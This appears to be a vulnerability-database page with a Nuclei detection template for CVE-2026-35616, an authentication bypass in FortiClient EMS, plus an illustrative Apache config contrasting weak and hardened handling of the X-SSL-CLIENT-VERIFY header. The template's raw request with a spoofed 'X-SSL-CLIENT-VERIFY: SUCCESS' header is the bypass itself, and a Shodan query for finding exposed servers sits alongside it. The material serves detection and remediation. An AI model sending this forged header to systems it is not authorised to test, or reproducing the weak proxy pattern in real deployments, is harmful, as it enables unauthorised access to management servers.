FortiClient EMS - Authentication Bypass
CVE-2026-35616
Verified
Description
Detects whether Fortinet hotfix FG-IR-26-099 for CVE-2026-35616 is missing by comparing behavioral responses from a certificate-authenticated endpoint. The template sends X-SSL-CLIENT-VERIFY: SUCCESS without certificate material and checks whether this spoofed header changes server behavior.
Severity
High
Exploit Probability
43%
Affected Product
forticlient_ems
Published Date
April 9, 2026
Template Author
ritikchaddha
CVE-2026-35616.yaml
id: CVE-2026-35616

info:
  name: FortiClient EMS - Authentication Bypass
  author: ritikchaddha
  severity: high
  description: |
    Detects whether Fortinet hotfix FG-IR-26-099 for CVE-2026-35616 is missing by comparing behavioral responses from a certificate-authenticated endpoint. The template sends X-SSL-CLIENT-VERIFY: SUCCESS without certificate material and checks whether this spoofed header changes server behavior.
  impact: |
    If spoofing X-SSL-CLIENT-VERIFY changes backend behavior, Apache is likely not stripping the header before Django, indicating the target is still vulnerable.
  remediation: |
    Apply Fortinet hotfix FG-IR-26-099 or upgrade to FortiClient EMS 7.4.7+.
  reference:
    - https://bishopfox.com/blog/api-authentication-bypass-in-forticlient-ems-7-4-5-7-4-6-cve-2026-35616
    - https://nvd.nist.gov/vuln/detail/CVE-2026-35616
  classification:
    cve-id: CVE-2026-35616
    epss-score: 0.43209
    epss-percentile: 0.9755
    cwe-id: CWE-284
  metadata:
    verified: true
    max-request: 2
    vendor: fortinet
    product: forticlient_ems
    shodan-query: http.favicon.hash:-800551065
  tags: cve,cve2026,fortinet,forticlient,ems,auth-bypass,kev,vkev

http:
  - raw:
      - |
        POST /api/v1/fabric_device_auth/fortigate/init HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 0

        f

      - |
        POST /api/v1/fabric_device_auth/fortigate/init HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 0
        X-SSL-CLIENT-VERIFY: SUCCESS

        f

    matchers:
      - type: dsl
        dsl:
          - "contains(tolower(body_1), 'certificate not found')"
          - "status_code_1 == 401 && status_code_2 == 500"
          - "(body_1 != body_2)"
        condition: and
# digest: 490a0046304402202020842f09e9346988027da8661fdbdf489ab94346bedd375e4fdfe61deaae5302203b281a7f09f77f26a6e6370814afd4700500a0ead4617601d7b1333bff823c74:922c64590222798bb761d5b6d8e729507.5
Severity
CVSS Metrics
CVE ID:
cve-2026-35616
CWE ID:
cwe-284
Remediation Steps
Apply Fortinet hotfix FG-IR-26-099 or upgrade to FortiClient EMS 7.4.7+.
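The reverse-proxy hardening the template's impact text points at, shown as an added illustrative Apache fragment that is not Fortinet's configuration and not part of the Nuclei template. It assumes the generic layout the impact text describes: Apache (mod_ssl, mod_headers, mod_proxy) terminating TLS in front of a Django backend on 127.0.0.1:8000 that trusts the X-SSL-CLIENT-VERIFY header; the hostnames, ports and the conditional in the weak variant are assumptions for illustration.

```apache
# Illustrative example, not Fortinet's shipped configuration.
# Assumption: Django on 127.0.0.1:8000 reads X-SSL-CLIENT-VERIFY to decide
# whether a fabric device presented a valid client certificate.

# Weak pattern: the header is only written when mod_ssl verified a certificate.
# When no certificate was presented the directive does nothing, so a copy of the
# header supplied by the client in its own request passes through to Django unchanged.
<VirtualHost *:443>
    SSLEngine on
    SSLVerifyClient optional
    SSLOptions +StdEnvVars
    RequestHeader set X-SSL-CLIENT-VERIFY "%{SSL_CLIENT_VERIFY}s" "expr=%{SSL_CLIENT_VERIFY} == 'SUCCESS'"
    ProxyPass / http://127.0.0.1:8000/
    ProxyPassReverse / http://127.0.0.1:8000/
</VirtualHost>

# Hardened pattern: drop any client-supplied copy first, then always write the
# header from mod_ssl's own result (SUCCESS, NONE or FAILED:...), so the backend
# only ever sees a value Apache produced. Apply the unset on every listener,
# including plain-HTTP ones, so no path reaches Django with a forged value.
<VirtualHost *:443>
    SSLEngine on
    SSLVerifyClient optional
    SSLOptions +StdEnvVars
    RequestHeader unset X-SSL-CLIENT-VERIFY early
    RequestHeader set X-SSL-CLIENT-VERIFY "%{SSL_CLIENT_VERIFY}s"
    ProxyPass / http://127.0.0.1:8000/
    ProxyPassReverse / http://127.0.0.1:8000/
</VirtualHost>

<VirtualHost *:80>
    RequestHeader unset X-SSL-CLIENT-VERIFY early
    ProxyPass / http://127.0.0.1:8000/
    ProxyPassReverse / http://127.0.0.1:8000/
</VirtualHost>
```

With the hardened form in place the two requests in the template should produce the same response, since the forged header never reaches the backend; a differing second response is the signal the template's matchers key on.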